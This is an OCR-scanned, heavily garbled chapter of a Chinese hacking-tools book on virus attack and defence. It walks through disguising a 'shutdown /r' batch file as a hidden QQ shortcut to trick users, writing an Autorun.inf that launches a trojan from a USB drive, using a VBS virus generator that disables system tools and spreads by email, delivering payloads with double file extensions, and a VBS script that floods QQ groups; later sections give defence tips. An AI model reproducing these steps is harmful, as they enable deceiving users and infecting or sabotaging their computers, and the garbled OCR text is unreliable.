粘贴 (P) 

粘贴 快捷 方式 (9) 
撤消 删除 (U) 
新 建 (W) 

硬性 (R) 


在 桌面 空 日 处 单 击 鼠 标 右键 , 在 快捷 菜单 中 选择 "新 


建 ” > “文本 文档 ”命令 。 
STEP03: 保存 文件 
汉 新 建文 本 文档 txt -记事 本 


文件 [Fi) | 编辑 (E) 格式 (DO) 查看 (V) 帮助 (H) 


选择 “文件 >“ 保存 "菜单 命令 。 
STEP05: | 右 击 “ 腾 讯 QQ.bat” 图 标 


在 快捷 菜单 中 选择 “创建 快捷 方式 ”命令 。 
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STEP02: 打开 新 建 的 记事 本 


习 新 建文 本 文档 ,txt - 记事 本 
文件 (Fi 绽 缉 人 E) 格 二 (D) 章 看 (W 帮助 ({H) 
shutdown /r 


输入 "shutdown /r 命令 ， 即 自动 重启 本 地 计算 机 。 
STEP04: 重 命名 文本 文档 为 腾讯 QQ.bat 


1 如 果 改 变 立 件 扩展 名 ， 可 能 会 导 玫 这 件 个 可 用 。 
”确实 要 更 改 吗 ? 


在 弹出 的 “ 重 命名 ”对 话 框 中 单 击 “ 是 ”按钮 。 
STEP06: 右 击 快捷 方式 图 标 


-Ai ER 


创建 快捷 方式 (9) 
删除 (D) 


吾 帝 名 (MI) 


在 快捷 菜单 中 选择 “属性 ”命令 。 


STEP07: 更 改 图 标 


-| 用 讯 QQ.bat- 快 捷 方 式 层 性 


打开 文件 位 置 中 


切换 至 “快捷 方式 ” 辆 单 击 “ 更 改 图 标 " 
选项 卡 。 按钮 。 


STEP09: 选择 图 标 


更 改 图 标 
查找 此 文件 中 的 图 标 LL) 
SystemRootg%Asysten32ASHELL32. 


典 以 下 到 表 中 选择 一 个 图 标 5): 


在 列表 中 选择 程序 图 标 , 如 果 没 有 合适 的 则 单 击 “ 浏 
览 ” 按钮 。 
STEP11: 查看 已 选 的 ico 图 标 


| 更 改 图 标 
查找 此 文件 中 的 图 标 各 : 
F. \ 恬 讯 aod 冉 标 下 载 lico 
从 以 下 列表 中 选择 一 个 图 标 (5) 


单 击 “确定 ”按钮 。 


:3 


第 4 章 
病毒 攻防 


STEP08: 查看 提示 信息 


二 腾讯 QQ.bat- 快 捷 方 式 尾 性 


_ 颜色 。 | 兼容 性 | 安全 | 详细 信息 es 


快捷 方式 ”| -选项 | 字体 | 布局 


文件 EM 新 建文 忻 夹 \ 计 算 机 闪 \ 新 建文 件 详 \ 话 讯 QQ.bat 不 包 合 图标 ， 
” ”请 从 列表 中 选择 一 个 圈 标 或 指证 男 一 个 文件 ， 


起 始 位 置 ): 下 :\ 新 建文 件 来 * 计 算 机 类 "新 建文 件 来 
快捷 键 必 ): 上 


单 击 “确定 ”按钮 。 


STEP10: 选择 ico 格式 的 图 标 


马 | 更 改 图 标 
Os Hn es) 
组 织 新 建文 件 去 
区 下 载 
园 点 面 


elsave.exe 


1ico 
DS es nl 
新 建文 件 夫 
2bit (2).exe cost 1 分 


- 


“| 图 标 文件 (*.ico;*.ick*.exe;*.dll) v 


文件 名 (N): 腾 污 qq 图 标 下 载 1.icq 


选中 ico 格 式 的 图 标 。 国 单 击 “ 打 开 " 按钮。 


STEP12: 查看 生成 的 腾讯 QQ.bat 图 标 


习 诬 讯 QQ,bat- 快 环 方 式 尾 性 
常规 


快捷 方式 一 
个 


目标 类 型 : 
目标 位 置 : 


腾讯 QQ. bat- 快 捷 方 式 


Windows 批 处 理 文 件 
新 建文 件 来 


单 击 “确定 ”按钮 。 


Py > 
2 工具 全 攻略 


合 人 他 他 


STEP13: 查看 修改 后 的 快捷 图 标 STEP14: 右 击 .bat 快捷 图 标 


还 原 以 前 的 版 本 (V) 
点 送 到 (N) 


莫 切 人 Tm) 
复 宙 人 (O) 


创建 快捷 方式 (9) 
删除 (D) 
重 矶 名 (MI) 


在 桌面 上 查看 修改 后 的 快捷 图 标 , 将 其 名 称 改 为 “ 腾 “在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 。 
讯 QO ” 。 


STEP15: 将 文件 设置 为 隐藏 STEP16: 打开 “文件 夹 ”选项 


i Lal 站 
SS OE 
常规 ”|| 快捷 方式 | 选 字体 | 布局 文件 (月 ”编辑 (E) ”查看 (V) 帮助 (H) 

腾讯 QQ. bat 组 织 = 竺 统 层 性 映射 网 阁 驱 动 右 (NN)... 


疡 开 网 阁 驱 动 右 (DD)... 


广 收藏 夫 打开 同步 中 心 (S).. 
回 只 读 @) ” 回 隐 藏 00 局 下 载 


恩 讲 面 
闻 最 近 访问 的 位 置 


Ee 


6.51 GB 5 用 ， 
tutuDisk WA 


切换 至 "常规 " 选项 卡 。 较 单 击 "确定 " 按钮 。 在 桌面 上 双击 “计算 机 ”图 标 ， 然 后 选择 "工具 ”> 
“文件 夹 选项 ”菜单 命令 。 
STEP17: 设置 不 显示 隐藏 的 文件 STEP18: 设置 后 在 采 面 上 查看 快捷 图 标 


视图 
本 
| 应 用 到 区 件 来 LL) 


| 隐藏 计算 机 文件 来 中 的 空 驱 动 器 
区 半生 (推荐 ) 


[ i a 


切换 至 “ 查 选中 “不 显示 隐藏 的 文件 、 
看 " 选项 卡 。 文件 夹 或 驱动 器 ” 单 选 按钮 
然后 单 击 “ 确 定 ” 按 钮 。 


可 看 到 桌面 上 未 显示 “腾讯 QQ.bat” 图 标 ， 只 显示 
了 腾讯 QO 图 标 ， 用 户 一 旦 双击 该 图 标 ， 计 算 机 
便 会 重启 。 


ER 


病 毒 攻防 


4.1.2 了 盟 病 毒 生成 肯 光 与 防 学 


U 盘 病 毒 ， 又 称 Autorun 病毒 ， 束 是 通过 UU 盘 产生 AutoRun.inf 进行 传播 的 病毒 。 随 春 
U 盘 、 移 动 便 盘 、 存 储 卡 等 移动 存储 设备 的 普及 ，U 盘 病 毒 已 经 成 为 目前 比较 流行 的 计算 
机 病毒 之 一 。U 盘 病 毒 并 不 只 存在 于 U 盘 ,“ 中 毒 ” 计 算 机 的 每 个 分 区 下 面 同 样 有 U 可 病 
毒 ， 导 致 计算 机 和 TU 盘 区 叉 传 播 。 了 解 U 盘 病 毒 的 生成 方法 与 传播 方式 ， 才 能 够 更 好 地 做 
到 U 盘 病 毒 的 了 预防。 下面 将 会 曝光 简单 的 U 盘 病 毒 生成 过 程 。 

1. 制作 简单 的 U 盘 病毒 


STEP01: 将 病毒 或 木马 复制 到 UU 盘 中 STEP02: 在 U 盘 中 新 建文 本 文档 


| 


i 
二 | ， 计算 .， 可 移动 磁盘 (.. ~| 作 由 伏 雪 可 涂 动 B& 窜 (G) © S 隔 ， 计算 ..、 可 移动 态 盘 ( ， ”| 好 咱 闫 a 3 (6) 

| 文件 (| ”编辑 (E) 可 看 (V) 工具 (T) 帮助 (H) 

| 组织 Y 共享 了 新 建文 件 夫 


六 收藏 夫 
轧 下 载 | 
于 | 点 本 
便 最 访问 的 位 置 J 
司库 | 
图 PPTV 视 频 
国 视频 
图 图 片 
文档 
LD nA-T2 


1 个 对 铺 。 ”新 建文 本 文档 .txt 和 A 14:25 


wm 一 | a 时 昌明 oa 14:25 
直接 拖 动 病毒 或 木马 程序 到 U 盘 中 。 将 新 建 的 文本 文档 重合 名 为 Autorun.inf。 


STEP03: 查看 提示 信息 STEP04: 编写 Autorun.inf 文件 代码 


出 和 Autorun.inf - 记事 未 
| 文件 (日 ”编辑 (E) ”格式 (0) 查看 (V) 帮助 (H) 


[AutoRun] 


OPEN= 灰 人 鲁 子 . exe 
shellexecute= 灰 包子 . exe 
shell\Auto\command= 灰 人 鸟 子 . exe 


本 六 位 .bxt 人 2014/3/6 14:25 


\: 0 部 节 
es 2014/3/6 14:25 


单 击 “是 ”按钮 。 双击 Autorun.inf 文 件 打 开 记 事 本 窗口 ， 编 辑 文件 代 
码 ， 使 得 双击 U 盘 图 标 后 运行 指定 木马 程序 。 


Bo RZ Th 
全 人 人 他 


STEP05: 查看 属性 STEP06: es “隐藏 ” 


-| 难 ”压缩 并 E-mail... 
翟 ” 压 缩 到 " 灰 甬 子 .rar" 并 E-mail 


国 ”上传 到 百度 云 
自动 音 份 到 百度 云 


转 ” 使 用 Nero 进行 刻录 
贷 ” 通 了 QQ 发 送 到 我 的 手机 


发 送 到 (NN) | ee" 
: Dai 7 
和 可 隐藏 0 
复制 ( 口 
有 :2014/3/6 14:23 
jh: 0 字 节 删除 (D) 
有 2014/3/6 14:25 下 命名 (M) 


按 住 <Ctrl> 键 选中 木马 程序 和 Autorun.inf 文 件 并 右 切换 至 “ 常 色 选 “隐藏 ” 复 选 框 ， 然 后 


击 , 选择 “属性 ”命令 。 规 ” 选 项 卡 。 单 击 “ 确 定 ” 按 钮 。 
STEP07: 打开 “文件 夹 选 项 ” STEP08: 设置 不 显示 隐藏 的 文件 


CIA HE | ss 了 


< pe 
文件 (Fi) ”编辑 (E) ” 查 春 (V) 帮助 (H) 
组 织 v 图 打开 映射 网 络 驱 动 器 (N).. 
断 开 网 阁 驱 动 器 (D)... 
打开 同步 中 心 (S).. 


国标 基 司 拓 和 天 和 大 种 半 旨 9 这 委 和 
i 


ss 文件 去 选项 (O]) 
转 点 本 mm 


通 最 后 访问 的 位 置 


司库 
各 | PPTV 视 频 


在 U 盘 窗口 中 选择 “工具 ”> “文件 夹 选 项 ”命令 。 切换 至 “ 查 选中 “不 显示 隐藏 的 文件 、 
看 ”选项 卡 。 文件 夹 或 驱动 器 ” 单 选 按钮 ， 

然后 单 击 “确定 ”按钮 。 
将 U 盘 接 入 计算 机 中 , 右 击 U 盘 对 应 的 
图 标 ， 在 快捷 菜单 中 会 看 到 Auto 命令 ,表示 


设置 成 功 。 和 
2， 防范 U 盘 病毒 到 
1) 防范 U 盘 病 毒 的 最 好 办 法 也 是 实用 CE 
性 最 小 的 办 法 ， 就 是 不 将 吕 盘 插 到 安全 性 不 
明 的 计算 机 中 ， 但 是 这 几乎 不 可 能 达到 。 Em 
2) 设 置 显示 隐藏 文件 、 文 件 夹 和 驱动 器 ， ne 
取消 隐藏 已 知 文件 的 扩展 名 选项 。 这 可 以 有 a 
re 站 为 文件 夹 及 正常 文件 请 ed 


让 计算 机 显示 隐藏 文件 具体 方法 : 在 “ 控 


让 计算 机 显示 隐藏 文件 方法 


sx 
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制 面板 ”窗口 中 单 击 “ 文 件 夹 选项 ” 然后 按 石 图 进行 设置 。 

在 能 正常 显示 隐 羧 文件 或 扩展 名 的 情况 下 ， 模 仿 的 病毒 ， 如 图 标 是 文件 夹 的 exe 文件 、 
#.jpg.exe (“*” 代 指 文 件 名 ， 下 同 〉 这 类 明显 不 正常 的 文件 ， 大 家 尽量 不 要 点 击 。 需 要 注 
意 的 是 ，*.exe.jpg 也 不 要 随便 点 击 ， 这 有 可 能 是 Unicode 反 转 。 除 此 之 外 ， 还 有 网 址 快捷 
方式 是 *.url 的 这 类 文件 。 假 设 某 文件 名 是 WWW.PC841. COM， 这 不 是 网 址 ， 而 是 后 级 名 
为 com 的 软件 ， 基 本 可 以 肯定 它 是 伪 闭 的 病毒 。 这 两 类 文件 都 可 以 通过 在 右 击 并 选择 “ 属 
性 ”命令 查看 文件 类 型 。 

3) 对 付 目 动 运行 (AutoRun) 类 及 利用 系统 漏洞 的 病毒 ， 最 简单 的 是 安装 微软 的 补 
丁 ， 大 家 可 以 使 用 诸如 金山 卫士 或 者 360 安全 卫士 的 漏洞 修补 功能 目 动 修复 由 可 。 而 自 
动 运 行 (AutoRun) 类 病毒 从 Windows 7 系统 开始 这 方面 的 安全 已 经 完善 了 ， 无 需 再 担心 
此 问题 。 

4) 不 少 软 件 有 非 间 不 铺 的 防 杀 效 末 ， 如 360 卫士 及 杀毒 、 金 山 毒 霸 、QQ 
瑞星 、 详 顿 等 。 


4.2 ”脚本 病毒 生成 曝光 与 防范 


脚本 病毒 通常 是 由 JavaScript 编写 的 亚 意 代码 ， 一 般 市 有 广告 性 质 、 修 改正 首页 、 修 
改 注 册 表 等 信息 。 脚本 病毒 前 级 是 Script, 共同 点 是 使 用 脚本 语言 编写 , 通过 网 页 传播 病毒 ， 
如 红色 代码 (Seript.Redlof)。 脚 本 病毒 还 会 有 其 他 前 级 : VBS、JS (表明 是 何 种 脚本 编写 
的 )， 如 欢乐 时 光 (VBS.Happytime)、 十 四 日 (Js.Fortnight.c.s) 等 。 只 有 了 解 了 脚本 病毒 
的 特点 及 生成 过 程 ， 才 能 更 好 地 对 该 类 病毒 做 好 防范 。 


0 
只 
~ 
人 1 


4.2.1 VB$ 脚本 病毒 生成 机 
现在 网 络 中 还 流行 如 “VBS 脚本 病毒 生成 机 ”这 样 的 自动 生成 脚本 语言 软件 ， 让 用 户 
无 需 一 点 编程 知识 即 可 制造 出 一 个 VBS 脚本 病毒 。 下 面 将 会 曝光 脚本 病毒 的 生成 过 程 。 
STEP01: ”启动 病毒 生成 器 v1.0 STEP02: 程序 相关 介绍 
病毒 制造 机 v1.0 (oo | ~ | 
Ch 


A 
a Sa 
ee ee 个 | 


reset. vhs 运行 了 病 光世 ee 

成 乔 汪 直 和 站 外 了 个 

软件 作者 : 部 将 四 E-MAIL: liuli5542@sohu. com 
D00000038913_cnisina. com. em 


virl.exe 


修改 日 期 :|2002/9/11 15:05 


大 小 : 
创建 日 期 :|2013/11/8 17:54 


下 载 并 解压 “病毒 生成 器 ”压缩 文件 ， 打 开 对 应 的 ”图 单 击 “ 下 一 步 ” 按 钮 。 
文件 夹 ， 双 击 “vir1.exe” 应 用 程序 图 标 。 


:7 计时 时 时 


客 过 
PE 工 具 人 攻 了 


STEP03: 设置 病毒 复制 选项 STEP04: 设置 禁止 功能 选项 


病毒 制造 机 v1.0 | EE 病毒 制造 机 v1.0 


第 二 步 病毒 复制 选项 


禁 上 “运行 ”菜单 开机 自动 运行 
复制 病毒 副本 到 TDoYs 文 件 夹 (YIIDOYSAYITRIT 禁止 “关闭 系统 ”菜单 : 合 正 草 示 茧 道 所 用 图 乏 
RE 隐藏 明和 禁止 进入 Hs-D0s 横 式 
A 竺 止 使 用 注册 志 编 辑 器 钵 止 “任务 栏 和 开始 
禁止 注册 夫 扫 指 禁止 右键 荣 音 
禁止 “注销 ”菜单 禁用 “控制 面板 
禁止 进 XNs-D0s 实 模式 禁止 使 用 REc 文 件 《 危 险 ) 


勾 选 相应 复 选 框 并 填写 单 击 “ 下 一 步 ” 国 根据 所 要 制作 的 病毒 功能 国 单 击 “ 下 一 步 ” 
病毒 副本 文件 名 。 按钮 。 勾 选 相应 复 选 框 。 按钮 。 


者 勾 选 “开机 自动 运行 ” 复 选 框 ， 病 毒 将 自身 加 入 注册 表 中 ， 并 伴随 系 
@ 独 ”人 先 启 动情 悄 运 行 ， 如 果 勾 选 “ 茶 止 “运行 ”菜单 ”“ 茶 止 “关闭 系统 ”菜单 ” 
小 技 瑟 “禁止 “任务 栏 和 开始 2” 及 “禁止 显示 桌面 所 有 图 标 ” 等 复 选 框 ， 将 让 中 毒 
者 的 计算 机 出 现 一 些 莫 名 其 妙 的 错误 。 如 果 义 选 “隐藏 盘 符 ”“ 花 止 使 用 注册 
表 扫 描 ”“ 禁 用 “控制 面板 ”等 复 选 枉 ， 则 可 让 对 方 开机 后 找 不 到 硬盘 分 区 、 

无 法 运行 注册 表 编 辑 器 、 无 法 打开 控制 面板 等 。 


STEP05: 设置 病毒 提示 STEP06: 设置 病毒 传播 选项 


病毒 制造 机 v1.0 = 病夫 制造 机 v1.0 


第 四 步 病毒 提示 对 话 框 第 五 步 病毒 传播 选项 


设置 开机 提示 对 话 杠 通过 电子 邮件 进行 自动 传播 蠕虫 


没 示 框 标题 : 
设置 开机 提示 框 标题 每 次 运行 自动 向 地 址 漳 中 的 前 


本 1 
设置 开机 提示 框 内 容 :| 浆 迎 | 名 发送 囊 毒 邮件 。 


勾 选 “设置 开机 提示 对 话 单 击 “ 下 一 步 ” 图 勾 选 “通过 电子 邮件 进行 自 辆 单 击 “ 下 一 步 " 


框 " 复 选 框 ， 并 填写 开机 提示 按钮。 动 传播 ( 蠕虫 )” 复 选 框 ， 并 填 按钮 。 
框 标题 以 及 内 容 信息 。 写 发 送 带 毒 邮件 的 地 址 数量 。 


5: 
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STEP07: 设置 IE 修改 选项 
病毒 制造 礼 v1.0 
第 六 步 IE 修改 选项 
禁用 了 右键 菜 音 禁止 更 次 历史 记录 设置 加 本 
在 | 上 TInternet} 先 I 而 盐 目 Internet] 车 接 回 导 勾 选 要 禁用 的 | E 功 能 3 然后 单 击 下 一 步 按钮 。 
茜 用 “文件 “打开 ”菜单 ” 蛋 蔡 止 安全 项 


二 二 de ee 
号 于 
加 


守重 主 丰 
| | [请 铺 入 主页 地 让 ; 


在 打开 的 “设置 主页 ”对 话 框 中 填写 主页 地 址 ， 
并 单 击 “ 确 认输 入 ”按钮 。 


STEP08: 开始 制造 病毒 STEP09: 病毒 正在 生成 
病毒 制造 机 ,v1.0 


第 七 步 开始 制造 病毒 


请 碍 六 病毒 文件 存放 位 置 : 
pb:\. vhs 


团 在 文本 框 中 输入 病 单 击 “开始 制造 ” 出 现 病毒 生成 进度 条 ， 完成 后 可 在 文件 存储 位 置 查 
毒 文件 存放 位 置 。 按钮 。 看 已 经 生成 的 病毒 。 


在 病毒 生成 之 后 ， 如 何 让 病毒 在 对 方 的 计算 机 上 和 运行 呢 ? 有 许多 种 方法 ， 
熙 比如 修改 文件 名 ， 使 用 双 后 绥 的 文件 名 ， 如 “病毒 .xtvybs” 等 ， 再 通过 邮件 附 
件 发 送出 去 。 


小 技巧 。 在 用 此 软件 制造 生成 病毒 的 同时 ， 会 产生 一 个 名 为 “resetvbs” 的 恢复 文 
件 ， 如 果 不 小 心 运行 了 病毒 ， 系 统 将 不 能 正常 工作 ， 则 可 以 运行 它 来 解救 


4.2.2 VB 脚本 病 短 刷 QQ 群 聊天 屏 皮 区 


VBS 脚本 语言 功能 强大 ， 而 且 使 用 只 第 简单 ， 下 面 曝光 一 个 可 以 目 动 刷 QQ 和 群 聊天 屏 
的 VBS 病毒 。 

(1) 生成 VBS 脚本 

要 新 建 一 个 记事 本 ， 并 在 空白 的 文本 框 中 输入 如 下 代码 : 


:9 


客 有 
PE 工具 人 攻 了 


Set WshShell= WScript.CreateObject ("WScript.Shell") 
Wahshell. Aopaotiveate "个 于 i" 

tor ds] to 10 

NScCTI6t Slees. 3500 

WshSshell.SendKeys "VvV" 

WshShell.SendKeys 1 

WshShell.SendKeys "%s" 

Next 


其 中 “for i=1 to 10” 语 句 是 用 来 控制 发 送 次 数 的 ， 表 示 发 送 10 次 ， 也 可 以 改 为 更 大 的 
数字 。 其 中 很 重要 的 一 句 是 “WshShell.AppActivate "这 个 群 真 好 玩 "” 该 语句 指定 了 要 刷 
的 QQ 和 群 名 称 ， 可 以 根据 需要 修改 。 在 输入 完毕 后 ， 将 文件 保存 为 以 .vbs 为 后 级 的 任意 文 
件 名 ， 如 “qq.vbs”。 
(2) 刷 QQ 和 群 聊 天 斌 
打开 一 个 群 聊 天 窗口 并 复制 要 友 送 的 内 容 到 檀 贴 板 上 ， 如 复制 了 一 条 “什么 ?”， 双 击 


刚才 生成 的 “qq.vbs” 切 换 到 和 群 聊天 窗口 中 ， 在 其 中 可 看 到 已 经 在 目 动 刷 屏 了 


I 一 人 -7 一 
TT 


一 一 一 一 Fe 格式 (O) 查看 (V) 帮助 (H) 


Set WshShell= WScript. CreateOb ject (“WScript. Shell”) :* 
WshShell. AppActivate “这 个 群 真 好 玩 ” 
0 


toms(2302238958) 11:01:25 


"村 么 ?1 四 日 


.什么 ?2 相册 共享” 论坛。 讨论 组 | 


we 回回 四 图 
“什么 ?4 群 视频 ”语言 ”投票 ”看 节目 
.什么 ?5 


je 器 
.什么 ?7 | 
“什么 ?8 群 成 员 (11 P 
.什么 ?9 鱼 轿 toms(230223s95) 区 


“什么 ?10 ¥ 
A 日 A 本 加 -日 妈 - 山 轩 - 因 江 ia- 
| 


| 关 ao |][ 安 s) |-]| 


在 刷 屏 成 功 后 ， 每 一 条 信息 后 面 会 显示 信息 发 送 的 条 数 ， 当 发 送 完 指定 的 


条 数 后 ， 便 会 自动 停止 


4.3” 宏 病毒 与 邮件 病毒 防范 


宏 病 毒 与 邮件 病毒 是 广大 用 户 经 党 过 到 的 病毒 ， 如 来 中 了 这 些 病毒 束 可 能 给 目 己 造成 
重大 损失 ， 所 以 有 必要 了 解 这 方面 的 防范 知识 。 


4.3.{ 宏 病 毒 的 判断 方 ; 


虽然 不 是 所 有 包含 宏 的 文档 都 包含 了 宏 病 毒 ， 但 当 出 现下 列 情况 之 一 时 ， 则 可 以 断定 
该 Office 文档 或 Office 系统 中 有 宏 病 毒 。 


90 
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1) 在 打开 安 病毒 防护 功能 的 情况 下 ， 当 打开 一 个 自己 编辑 的 文档 时 ， 系 统 会 弹出 相应 
的 警告 框 。 而 目 己 清楚 并 没有 在 其 中 使 用 宏 或 并 不 知道 宏 到 的 怎么 用 ， 那 么 就 可 以 肯定 该 
文档 已 经 感染 了 宏 病 毒 。 

2) 在 打开 宏 病毒 防护 功能 的 情况 下 , 日 己 编辑 的 Office 文档 中 一 系列 文件 都 在 打开 时 
给 出 安 警 告 。 由 于 在 一 般 情 况 下 用 户 很 少 使 用 到 安 ， 因 此 当 目 己 看 到 成 串 的 文档 有 宏和 警告 
时 ， 可 以 肯定 这 些 文档 中 有 宏 病 毒 。 

3) 如 果 软 件 中 关于 宏 病 毒 防护 选项 局 用 后 ， 不 能 在 下 次 开机 时 依然 保存 。 但 有 些 宏 
病毒 为 了 对 付 Office 中 提供 的 宏 警 告 功 能 ， 它 在 感染 系统 (这 通常 只 有 在 用 户 关 闭 了 宏 
病毒 防护 选项 或 者 出 现 宏 警 告 后 不 留神 选取 了 “启用 宏 ” 才 有 可 能 ) 后 ， 会 在 用 户 每 次 
退出 Office 时 目 动 屏蔽 宏 病 毒 防护 选项 。 因此， 用 户 一 旦 发 现 目 己 设置 的 宏 病 毒 防护 功 
能 选项 无 法 在 两 次 月 动 Word 之 则 保持 有 效 ， 束 可 以 断定 目 己 的 系统 已 经 感染 了 宏 病 毒 。 
也 就 是 说 ， 一 系列 Word 模板 ， 特 别 是 normal.dot 已 经 被 感染 。 


© 鉴于 绝 大 多 数 人 都 不 需要 或 者 不 会 使 用 “ 宏 ” 功 能 ， 可 以 得 出 一 个 相当 重 


党 。 要 的 结论 : 如 果 Office 文档 在 打开 时 ， 系 统 给 出 一 个 宏 病毒 警告 框 ， 就 应 该 对 
提示 ”这 个 文档 保持 高 度 警惕 ， 它 已 被 感染 的 概率 极 大 。 


4.3.2 ”防范 与 清除 宏 病 毒 


针对 宏 病 毒 的 预防 和 清除 操作 方法 很 多 ， 下 向 介绍 两 种 方法 一 一 站 选 方 法 和 应 急 处 
理 廊 法 介绍 。 

(1) 首选 方法 

使 用 反 病 毒 软件 是 一 种 高 效 、 安 全 和 方便 的 清除 方法 ， 也 是 一 般 计 算 机 用 户 的 首选 方 
法 。 但 宏 病毒 使 用 通用 的 反 病 毒 软 件 也 未 必 能 得 出 ， 比 如 ETHAN 安 病毒 。ETHAN 宏 病毒 
相当 隐没 ， 用 户 使 用 较 新 版 本 的 有 反 病 毒 软件 都 无 法 查 出 它 。 此 外 ， 这 个 宏 病 毒 能 够 悄悄 关 
闭 Word 的 宏 病 毒 防护 功能 ， 并 且 某 些 情况 下 会 把 被 感染 的 文档 置 为 只 读 属 性 ， 从 而 更 好 
地 隐藏 目 己 。 

因此 ， 对 付 宏 病毒 应 该 与 对 付 其 他 种 类 的 病毒 一 样 ， 也 要 尽量 使 用 最 新 版 的 查 杀 病毒 
软件 。 无 论 用 户 使 用 的 是 何 种 反 病 毒 软件 ， 及 时 升级 是 非常 重要 的 。 

(2) 应 急 处 理 方法 

用 写字 板 或 Word 文档 作为 清除 宏 病 毒 的 桥梁 。 如 果 用 户 的 Word 系统 没有 感染 宏 病毒 ， 
但 需要 打开 某 个 外 来 的 、 已 查 出 感染 了 安 病毒 的 文档 ， 而 手头 现 有 的 反 病 毒 软件 又 无 法 得 
杀 它 们 ， 束 可 以 通过 以 下 步骤 查 杀 文档 中 的 宏 病 毒打 开 感 染 了 宏 病 毒 的 文档 (当然 是 局 
用 Word 中 的 宏 病 毒 防 护 功 能 并 在 宏 警 告 出 现时 选择 “取消 宏 ”)， 选 择 “ 文 件 ” 一 “另存 
为 ” 沫 单 命 令 ， 将 此 文档 改 存 成 写字 板 (RITF) 格式 或 Word 格式 。 

在 上 述 方法 中 ， 存 成 写字 板 格式 是 利用 RTF 文档 格式 没有 宏 ， 存 成 Word 格式 则 是 利 
用 Word 文档 在 转换 格式 时 会 失去 宏 的 特点 。 写 字 板 所 用 的 RTF 格式 适用 于 文档 中 的 内 容 
仅 限 于 文字 和 图 斤 的 情况 ， 如 果 文 档 内 容 中 除了 文字 、 网 请 外 还 有 网 形 或 表格 ， 按 Word 
格式 保存 一 般 不 会 丢失 这 些 内 容 。 存 盘 后 应 该 检查 一 下 文档 的 完整 性 ， 如 果 文 档 内 容 没 有 
任何 丢失 ， 并 且 在 重新 打开 此 文档 时 不 再 出 现 宏 警 告 则 大 功 告 成 。 
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4.3.3 ”全面 防御 邮件 病毒 


邮件 病毒 是 通过 电子 邮件 方式 进行 传播 的 病毒 的 总 称 。 电 子 邮件 传播 病毒 通 节 把 目 己 
作为 附件 发 送 给 被 攻击 者 ， 如 果 接 收 到 该 邮件 的 用 尸 不 小 心 打 开 了 附件 ， 病 毒 束 会 感染 本 
地 计算 机 。 另 外 ， 电 子 邮件 客户 端 程序 的 一 些 Bug 也 可 能 被 攻击 者 利用 以 传播 电子 邮件 病 
毒 ， 微 软 的 Outlook Express 时 经 丈 因 为 两 个 源 洞 可 以 被 攻击 者 编制 特制 的 代码 ， 使 接收 到 
邮件 的 用 户 不 需要 打开 附件 ， 即 可 目 动 运行 病毒 文件 。 

在 了 解 了 邮件 病毒 的 传染 方式 后 ， 用 户 隐 可 以 根据 其 特性 制定 出 相应 的 防范 撞 施 : 

1) 安 痛 防 病毒 程序 。 防 御 病 毒 感染 的 最 佳 方法 加 是 安 朔 防 病毒 扫描 程序 并 及 时 更 新 。 
防 病毒 程序 可 以 扫描 传 入 的 电子 邮件 中 的 已 知 病毒 ， 并 帮助 防止 这 些 病毒 感染 计算 机 。 新 
病毒 儿 乎 每 天 都 会 出 现 ， 因 此 需要 确保 及 时 更 新 防 病毒 程序 。 多 数 防 病毒 程序 都 可 以 设置 
为 定期 目 动 更 新 ， 以 有 具备 需要 与 最 新 病毒 进行 斗争 的 信息 。 

2) 打开 电子 邮件 附件 时 要 非 党 小心。 电子 邮件 附件 是 主要 的 病毒 感染 源 。 例 如 ， 用 
户 可 能 会 收 到 一 封 珊 有 附件 的 电子 邮件 (其 全 发 送 者 是 目 己 认识 的 人 )， 该 附件 被 伪装 为 
文档 、 照 片 或 程序 ， 但 实际 上 是 病毒 。 如 条 打开 该 文件 ， 病 毒 吏 会 感染 计算 机 。 如 末 收 
到 意外 的 电子 邮件 附件 ， 请 考 碟 在 打开 附件 乙 前 先 答 复发 件 人 ， 问 清 是 否 确实 及 送 了 这 
些 附 件 。 

3) 使 用 防 病毒 程序 检查 压缩 文件 内 容 。 病 毒 编写 者 用 于 将 恶意 文件 潜入 到 计算 机 中 的 
一 种 方法 是 使 用 压 有 文 件 格式 〈 如 .zip 或 .rar 格式 ) 将 文件 作为 附件 发 送 。 多 数 防 病毒 程序 
会 在 接收 到 附件 时 进行 扫描 ， 但 为 了 安全 起 抑 ， 应 该 将 压 约 附件 保存 到 计算 机 的 一 个 文 
件 夹 中 ， 在 打开 其 中 所 包含 的 任何 文件 之 前 先 使 用 防 病毒 程序 进行 扫 摘 。 

4) 单 击 邮件 中 的 链接 时 须 育 居 。 电 子 邮件 中 的 欺 纹 性 链接 通 第 作为 驴 局 的 一 部 分 使 
用 ,但 也 会 用 来 传输 病毒 。 点 击 欺 骗 性 链接 会 打开 一 个 网 页 ， 该 网 页 将 试图 向 计算 机 下 
载 恶意 软件 。 在 决定 是 否 点 击 邮件 中 的 链接 时 要 小 心 ， 尤 其 是 邮件 正文 看 上 去 含糊 不 清 ， 
如 邮件 上 写 者 “得 看 我 们 的 假期 铬 片 >， 但 没有 标识 用 户 或 发 件 人 的 个 人 信息 。 


4.4 全 面 防 范 网 络 蠕虫 
与 传统 的 病毒 不 同 ， 晴 虫 病毒 以 计算 机 为 载体 ， 以 网 络 为 攻击 对 象 ， 网 络 晴 虫 病毒 可 


分 为 利用 系统 级 别 漏洞 〈 主 动 传播 ) 和 利用 社会 工程 学 (欺骗 传播 ) 两 种 。 在 宽 惠 网络 迅 
速 普及 的 今天 ， 蜂 虫 病 毒 在 技术 上 已 经 能 够 成 熟地 利用 各 种 网 络 资 源 进行 传播 。 


4.4.1 ”网络 蠕虫 病毒 实例 分 析 


目前 ， 产 生 严 重 影 啊 的 蠕虫 病毒 有 很 多 ， 如 “英里 斯 蠕 忠 ”“ 美 丽 杀 手 ”“ 爱 虫 病毒 ” 
“红色 代码 ”“ 尼 姆 亚 ”“ 求 职 信 ” 和 “里 虫 王 ” 每 ， 都 给 人们 留 下 了 深刻 的 印象 。 

1.“Guapim” 蠕 虫 病毒 

“Guapim”(Worm.Guapim)〉 即 通过 即时 聊天 工具 和 文件 共 圣 网 络 传播 的 里 虫 病毒 。 友 
作 症 状 : 病毒 在 系统 目录 下 释放 病毒 文件 System32%\pkguar d32.exe， 并 在 注册 表 中 添加 特 
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定 键 值 以 实现 自 启 动 。 该 病毒 会 给 MSN、QQ 等 聊天 工具 的 好 友 发 送 诱 惑 性 消 筷 ， 如 
“Hehe.takea look at this funny game http://****//Monkye.exe”， 同 时 假借 Howto Hack.exe、 
HalfLife2FULL.exe、WindowsXP.exe、VisualStudio2005.exe 等 文件 名 复制 自身 到 文件 共享 
